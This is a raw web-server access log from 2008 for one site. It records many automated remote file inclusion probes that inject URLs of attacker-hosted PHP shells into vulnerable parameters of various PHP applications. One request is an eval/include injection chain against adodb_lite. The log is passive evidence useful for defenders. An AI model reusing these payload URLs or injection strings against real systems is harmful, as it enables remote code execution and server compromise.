66.135.39.118 - - [31/Aug/2008:10:42:19 -0700] "GET /logs/access_080731.log//newspublish/include.php?path%5Bdocroot%5D=http://septimamaipu.cl/septima/mambots/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
66.135.39.118 - - [31/Aug/2008:10:42:23 -0700] "GET /logs/access_080731.log//newspublish/include.php?path%5Bdocroot%5D=http://septimamaipu.cl/septima/mambots/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
89.108.64.208 - - [31/Aug/2008:10:42:26 -0700] "GET /logs/access_080724.log//agendax/addevent.inc.php?agendax_path=http://jofchurch.org/calendar//tools//mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
89.108.64.208 - - [31/Aug/2008:10:42:27 -0700] "GET //agendax/addevent.inc.php?agendax_path=http://jofchurch.org/calendar//tools//mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
89.108.64.208 - - [31/Aug/2008:10:42:27 -0700] "GET /logs//agendax/addevent.inc.php?agendax_path=http://jofchurch.org/calendar//tools//mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
66.103.152.151 - - [31/Aug/2008:10:42:28 -0700] "GET /logs/access_080617.log//main.php?pag=http://peru.americautos.com/images/idi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
66.135.39.118 - - [31/Aug/2008:10:42:30 -0700] "GET /logs/access_080304.log//newspublish/include.php?path%5Bdocroot%5D=http://septimamaipu.cl/septima/mambots/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
66.135.39.118 - - [31/Aug/2008:10:42:30 -0700] "GET /logs/access_080430.log//newspublish/include.php?path%5Bdocroot%5D=http://septimamaipu.cl/septima/mambots/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
213.113.108.116 - - [31/Aug/2008:10:42:39 -0700] "GET /logs/convert/mvcw.php?vwar_root=http://www.marioni.info/alb2?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.113.108.116 - - [31/Aug/2008:10:42:39 -0700] "GET /convert/mvcw.php?vwar_root=http://www.marioni.info/alb2?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.19.192.212 - - [31/Aug/2008:10:42:43 -0700] "GET //modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://genthal.com/data/alb.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
89.108.64.208 - - [31/Aug/2008:10:42:44 -0700] "GET /logs/access_080510.log//agendax/addevent.inc.php?agendax_path=http://jofchurch.org/calendar//tools//mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
147.202.44.247 - - [31/Aug/2008:10:42:52 -0700] "GET /logs/access_080723.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://zuppl.de/documents/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
147.202.44.247 - - [31/Aug/2008:10:42:52 -0700] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://zuppl.de/documents/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
147.202.44.247 - - [31/Aug/2008:10:42:52 -0700] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://zuppl.de/documents/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.103.152.151 - - [31/Aug/2008:10:43:02 -0700] "GET /logs/access_071224.log//main.php?p=http://peru.americautos.com/images/idi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
207.210.89.58 - - [31/Aug/2008:10:43:02 -0700] "GET /logs/config.php?path_to_root=http://www.marioni.info/alb2?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
207.210.89.58 - - [31/Aug/2008:10:43:02 -0700] "GET /config.php?path_to_root=http://www.marioni.info/alb2?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
193.178.228.12 - - [31/Aug/2008:10:43:26 -0700] "GET //lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.menaspalace.com/k4m1/rid??? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)" "www.dmulk.com"
193.178.228.12 - - [31/Aug/2008:10:43:26 -0700] "GET /logs//lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.menaspalace.com/k4m1/rid??? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)" "www.dmulk.com"
213.113.108.116 - - [31/Aug/2008:10:43:33 -0700] "GET /logs/convert/mvcw.php?vwar_root=http://www.marioni.info/alb2?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.113.108.116 - - [31/Aug/2008:10:43:34 -0700] "GET /convert/mvcw.php?vwar_root=http://www.marioni.info/alb2?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.135.39.118 - - [31/Aug/2008:10:43:42 -0700] "GET /logs/access_080304.log//newspublish/include.php?path%5Bdocroot%5D=http://septimamaipu.cl/septima/mambots/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
66.135.39.118 - - [31/Aug/2008:10:43:43 -0700] "GET /logs/access_080430.log//newspublish/include.php?path%5Bdocroot%5D=http://septimamaipu.cl/septima/mambots/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
80.74.146.175 - - [31/Aug/2008:10:43:43 -0700] "GET //theme/phpAutoVideo/LightTwoOh/sidebar.php?loadpage=http://www.ganzkoerperpflege.at/files/oye.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.218.85.18 - - [31/Aug/2008:10:43:47 -0700] "GET /logs/access_080616.log/ncaster/admin/addons/archive/archive.php?adminfolder=http://www.marioni.info/alb2?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.218.85.18 - - [31/Aug/2008:10:43:48 -0700] "GET /ncaster/admin/addons/archive/archive.php?adminfolder=http://www.marioni.info/alb2?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.74.146.175 - - [31/Aug/2008:10:43:48 -0700] "GET /logs//theme/phpAutoVideo/LightTwoOh/sidebar.php?loadpage=http://www.ganzkoerperpflege.at/files/oye.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.74.146.175 - - [31/Aug/2008:10:43:48 -0700] "GET /logs/access_080701.log//theme/phpAutoVideo/LightTwoOh/sidebar.php?loadpage=http://www.ganzkoerperpflege.at/files/oye.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.74.146.175 - - [31/Aug/2008:10:43:48 -0700] "GET /logs/access_080529.log//theme/phpAutoVideo/LightTwoOh/sidebar.php?loadpage=http://www.ganzkoerperpflege.at/files/oye.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.218.85.18 - - [31/Aug/2008:10:43:48 -0700] "GET /logs/ncaster/admin/addons/archive/archive.php?adminfolder=http://www.marioni.info/alb2?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
59.126.46.141 - - [31/Aug/2008:10:43:53 -0700] "GET /logs/access_080611.log//config/dbutil.bck.php?confdir=http://aceperform.siteburg.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.113.108.116 - - [31/Aug/2008:10:43:57 -0700] "GET /logs/config.php?path_to_root=http://www.marioni.info/alb2?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.113.108.116 - - [31/Aug/2008:10:43:57 -0700] "GET /logs/config.php?path_to_root=http://www.marioni.info/alb2?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.113.108.116 - - [31/Aug/2008:10:43:57 -0700] "GET /config.php?path_to_root=http://www.marioni.info/alb2?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.113.108.116 - - [31/Aug/2008:10:43:57 -0700] "GET /config.php?path_to_root=http://www.marioni.info/alb2?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
59.126.46.141 - - [31/Aug/2008:10:43:57 -0700] "GET /logs/access_080705.log//config/dbutil.bck.php?confdir=http://aceperform.siteburg.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
147.202.44.247 - - [31/Aug/2008:10:43:58 -0700] "GET /logs/access_080723.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://giam.go.ro/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
147.202.44.247 - - [31/Aug/2008:10:43:58 -0700] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://giam.go.ro/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
147.202.44.247 - - [31/Aug/2008:10:43:58 -0700] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://giam.go.ro/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.113.108.116 - - [31/Aug/2008:10:44:22 -0700] "GET /logs/access_080127.log/convert/mvcw.php?step=1&vwar_root=http://www.marioni.info/alb2?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.113.108.116 - - [31/Aug/2008:10:44:22 -0700] "GET /convert/mvcw.php?step=1&vwar_root=http://www.marioni.info/alb2?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.113.108.116 - - [31/Aug/2008:10:44:23 -0700] "GET /logs/convert/mvcw.php?step=1&vwar_root=http://www.marioni.info/alb2?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.113.108.116 - - [31/Aug/2008:10:44:23 -0700] "GET /logs/access_080114.log/convert/mvcw.php?step=1&vwar_root=http://www.marioni.info/alb2?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.113.108.116 - - [31/Aug/2008:10:44:26 -0700] "GET /logs/access_080127.log/convert/mvcw.php?step=1&vwar_root=http://www.marioni.info/alb2?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.113.108.116 - - [31/Aug/2008:10:44:27 -0700] "GET /convert/mvcw.php?step=1&vwar_root=http://www.marioni.info/alb2?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.113.108.116 - - [31/Aug/2008:10:44:27 -0700] "GET /logs/convert/mvcw.php?step=1&vwar_root=http://www.marioni.info/alb2?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.113.108.116 - - [31/Aug/2008:10:44:28 -0700] "GET /logs/access_080114.log/convert/mvcw.php?step=1&vwar_root=http://www.marioni.info/alb2?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.19.61.90 - - [31/Aug/2008:10:44:31 -0700] "GET /logs/includes/ktedit/toolbar.php?dirDepth=http://208.46.111.12/images/images.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
67.19.61.90 - - [31/Aug/2008:10:44:31 -0700] "GET /includes/ktedit/toolbar.php?dirDepth=http://208.46.111.12/images/images.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
67.19.61.90 - - [31/Aug/2008:10:44:41 -0700] "GET /logs/access_080820.log/demo1/auction_confirmation.inc.php/header.php?prefix=http://208.46.111.12/images/images.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
67.19.61.90 - - [31/Aug/2008:10:44:41 -0700] "GET /demo1/auction_confirmation.inc.php/header.php?prefix=http://208.46.111.12/images/images.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
67.19.61.90 - - [31/Aug/2008:10:44:41 -0700] "GET /logs/demo1/auction_confirmation.inc.php/header.php?prefix=http://208.46.111.12/images/images.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
210.116.102.204 - - [31/Aug/2008:10:44:43 -0700] "GET /logs/access_080707.log/convert/mvcw.php?vwar_root=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
74.6.18.227 - - [31/Aug/2008:10:44:47 -0700] "GET /logs/access_070926.log HTTP/1.0" 200 34093 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
89.218.85.18 - - [31/Aug/2008:10:44:49 -0700] "GET /logs/config.php?path_to_root=http://www.marioni.info/alb2?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.218.85.18 - - [31/Aug/2008:10:44:49 -0700] "GET /config.php?path_to_root=http://www.marioni.info/alb2?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.84.82.15 - - [31/Aug/2008:10:44:51 -0700] "GET /logs/access_080409.log/inc/header.php/step_one.php?server_inc=http://locoputo.supergranny.ws/bot.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
210.116.102.204 - - [31/Aug/2008:10:45:03 -0700] "GET /logs/access_080614.log/convert/mvcw.php?vwar_root=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
67.19.192.212 - - [31/Aug/2008:10:45:10 -0700] "GET /logs/access_080715.log//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=uid=32021(awstats)%20gid=32023(awstats)%20groups=32023(awstats)%0A? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
67.19.192.212 - - [31/Aug/2008:10:45:10 -0700] "GET //modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=uid=32021(awstats)%20gid=32023(awstats)%20groups=32023(awstats)%0A? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
67.19.192.212 - - [31/Aug/2008:10:45:10 -0700] "GET /logs//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=uid=32021(awstats)%20gid=32023(awstats)%20groups=32023(awstats)%0A? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
89.218.85.18 - - [31/Aug/2008:10:45:19 -0700] "GET /logs/senetman/html/index.php?page=http://www.marioni.info/alb2?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.218.85.18 - - [31/Aug/2008:10:45:20 -0700] "GET /senetman/html/index.php?page=http://www.marioni.info/alb2?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.113.108.116 - - [31/Aug/2008:10:45:27 -0700] "GET /logs//include.php?path[docroot]=http://www.marioni.info/alb2?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.113.108.116 - - [31/Aug/2008:10:45:27 -0700] "GET //include.php?path[docroot]=http://www.marioni.info/alb2?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
204.214.80.199 - - [31/Aug/2008:10:45:29 -0700] "GET /logs/access_080724.log//agendax/addevent.inc.php?agendax_path=http://jofchurch.org/calendar//tools//mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
204.214.80.199 - - [31/Aug/2008:10:45:29 -0700] "GET //agendax/addevent.inc.php?agendax_path=http://jofchurch.org/calendar//tools//mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
204.214.80.199 - - [31/Aug/2008:10:45:29 -0700] "GET /logs//agendax/addevent.inc.php?agendax_path=http://jofchurch.org/calendar//tools//mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.18.29.218 - - [31/Aug/2008:10:45:37 -0700] "GET /logs/access_080820.log//index.php?option=com_custompages&cpage=http://lnx.padellino.com/forum/modules/inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.74.146.175 - - [31/Aug/2008:10:45:39 -0700] "GET /logs/access_080725.log//theme/phpAutoVideo/LightTwoOh/sidebar.php?loadpage=http://www.ganzkoerperpflege.at/files/oye.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
204.214.80.199 - - [31/Aug/2008:10:45:42 -0700] "GET /logs/access_080510.log//agendax/addevent.inc.php?agendax_path=http://jofchurch.org/calendar//tools//mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.128.80.13 - - [31/Aug/2008:10:45:43 -0700] "GET /logs/access_080614.log/index1.php?menu=http://peru.americautos.com/images/super-id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
64.128.80.13 - - [31/Aug/2008:10:45:43 -0700] "GET /index1.php?menu=http://peru.americautos.com/images/super-id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
64.128.80.13 - - [31/Aug/2008:10:45:43 -0700] "GET /logs/index1.php?menu=http://peru.americautos.com/images/super-id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
62.210.139.66 - - [31/Aug/2008:10:45:45 -0700] "GET /logs/access_080304.log//newspublish/include.php?path%5Bdocroot%5D=http://septimamaipu.cl/septima/mambots/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
80.74.146.175 - - [31/Aug/2008:10:45:45 -0700] "GET /logs/access_080717.log//theme/phpAutoVideo/LightTwoOh/sidebar.php?loadpage=http://www.ganzkoerperpflege.at/files/oye.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.210.139.66 - - [31/Aug/2008:10:45:47 -0700] "GET /logs/access_080430.log//newspublish/include.php?path%5Bdocroot%5D=http://septimamaipu.cl/septima/mambots/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
64.128.80.13 - - [31/Aug/2008:10:45:49 -0700] "GET /logs/access_080326.log/index1.php?menu=http://peru.americautos.com/images/super-id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
210.116.102.204 - - [31/Aug/2008:10:45:50 -0700] "GET /logs/access_080707.log/convert/mvcw.php?step=1&vwar_root=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
83.137.192.222 - - [31/Aug/2008:10:46:01 -0700] "GET /logs/index.php?redir=http://www.geoduck.org/cache/cmd7.gif?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)" "www.dmulk.com"
83.137.192.222 - - [31/Aug/2008:10:46:02 -0700] "GET /index.php?redir=http://www.geoduck.org/cache/cmd7.gif?? HTTP/1.1" 200 89461 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)" "www.dmulk.com"
209.51.155.138 - - [31/Aug/2008:10:46:07 -0700] "GET /logs/access_080723.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://lnx.padellino.com/forum/modules/inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
209.51.155.138 - - [31/Aug/2008:10:46:08 -0700] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://lnx.padellino.com/forum/modules/inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
209.51.155.138 - - [31/Aug/2008:10:46:08 -0700] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://lnx.padellino.com/forum/modules/inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
210.116.102.204 - - [31/Aug/2008:10:46:09 -0700] "GET /logs/access_080614.log/convert/mvcw.php?step=1&vwar_root=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
72.52.136.89 - - [31/Aug/2008:10:46:11 -0700] "GET /logs/access_080820.log/demo1/auction_confirmation.inc.php/header.php?prefix=http://208.46.111.12/images/images.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
81.248.63.177 - - [31/Aug/2008:10:46:17 -0700] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://www.geoduck.org/cache/cmd7.gif?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
81.248.63.177 - - [31/Aug/2008:10:46:18 -0700] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.geoduck.org/cache/cmd7.gif?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
66.103.152.151 - - [31/Aug/2008:10:46:23 -0700] "GET /logs/access_080506.log/forum.php?act=http://peru.americautos.com/images/idi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
66.103.152.151 - - [31/Aug/2008:10:46:23 -0700] "GET /forum.php?act=http://peru.americautos.com/images/idi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
66.103.152.151 - - [31/Aug/2008:10:46:24 -0700] "GET /logs/forum.php?act=http://peru.americautos.com/images/idi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
66.103.152.151 - - [31/Aug/2008:10:46:24 -0700] "GET /logs/access_080430.log/forum.php?act=http://peru.americautos.com/images/idi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
89.218.85.18 - - [31/Aug/2008:10:46:33 -0700] "GET /logs//include.php?path[docroot]=http://www.marioni.info/alb2?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.218.85.18 - - [31/Aug/2008:10:46:33 -0700] "GET //include.php?path[docroot]=http://www.marioni.info/alb2?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.128.80.13 - - [31/Aug/2008:10:46:40 -0700] "GET /logs/access_080127.log/index1.php?menu=http://peru.americautos.com/images/super-id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
64.128.80.13 - - [31/Aug/2008:10:46:40 -0700] "GET /index1.php?menu=http://peru.americautos.com/images/super-id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
64.128.80.13 - - [31/Aug/2008:10:46:40 -0700] "GET /logs/index1.php?menu=http://peru.americautos.com/images/super-id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
64.128.80.13 - - [31/Aug/2008:10:46:42 -0700] "GET /logs/access_080522.log//index.php?x=http://peru.americautos.com/images/super-id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
64.128.80.13 - - [31/Aug/2008:10:46:44 -0700] "GET //index.php?x=http://peru.americautos.com/images/super-id.txt??? HTTP/1.1" 200 89527 "-" "libwww-perl/5.811" "www.dmulk.com"
64.128.80.13 - - [31/Aug/2008:10:46:44 -0700] "GET /logs//index.php?x=http://peru.americautos.com/images/super-id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
64.128.80.13 - - [31/Aug/2008:10:46:44 -0700] "GET /logs/access_080727.log/index1.php?menu=http://peru.americautos.com/images/super-id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
66.185.168.98 - - [31/Aug/2008:10:46:50 -0700] "GET /logs/access_080723.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://lnx.padellino.com/forum/modules/inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.185.168.98 - - [31/Aug/2008:10:46:50 -0700] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://lnx.padellino.com/forum/modules/inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.185.168.98 - - [31/Aug/2008:10:46:50 -0700] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://lnx.padellino.com/forum/modules/inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.185.168.98 - - [31/Aug/2008:10:46:51 -0700] "GET /logs/access_080723.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://lnx.padellino.com/forum/modules/inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.185.168.98 - - [31/Aug/2008:10:46:51 -0700] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://lnx.padellino.com/forum/modules/inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.185.168.98 - - [31/Aug/2008:10:46:51 -0700] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://lnx.padellino.com/forum/modules/inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
62.212.130.16 - - [31/Aug/2008:10:47:05 -0700] "GET //index.php?place=http://albgroup.100megsfree8.com/Id/rd.txt??? HTTP/1.1" 200 89522 "-" "libwww-perl/5.805" "www.dmulk.com"
62.212.130.16 - - [31/Aug/2008:10:47:09 -0700] "GET /index.php?ort=http://albgroup.100megsfree8.com/Id/rd.txt??? HTTP/1.1" 200 89491 "-" "libwww-perl/5.805" "www.dmulk.com"
66.103.152.151 - - [31/Aug/2008:10:47:11 -0700] "GET /logs//main.php?pagina=http://peru.americautos.com/images/idi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
66.103.152.151 - - [31/Aug/2008:10:47:11 -0700] "GET //main.php?pagina=http://peru.americautos.com/images/idi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
193.207.106.54 - - [31/Aug/2008:10:47:21 -0700] "GET /logs/access_080529.log//theme/phpAutoVideo/LightTwoOh/sidebar.php?loadpage=http://www.ganzkoerperpflege.at/files/oye.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
193.207.106.54 - - [31/Aug/2008:10:47:21 -0700] "GET //theme/phpAutoVideo/LightTwoOh/sidebar.php?loadpage=http://www.ganzkoerperpflege.at/files/oye.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
193.207.106.54 - - [31/Aug/2008:10:47:21 -0700] "GET /logs//theme/phpAutoVideo/LightTwoOh/sidebar.php?loadpage=http://www.ganzkoerperpflege.at/files/oye.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
80.84.82.15 - - [31/Aug/2008:10:47:28 -0700] "GET /logs/inc/header.php/step_one.php?server_inc=http://locoputo.supergranny.ws/bot.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.29.68.220 - - [31/Aug/2008:10:47:32 -0700] "GET /logs/access_080726.log//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.alevichat.com/idN.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.29.68.220 - - [31/Aug/2008:10:47:32 -0700] "GET /logs/access_080726.log//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.alevichat.com/idN.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.29.68.220 - - [31/Aug/2008:10:47:33 -0700] "GET //administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.alevichat.com/idN.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
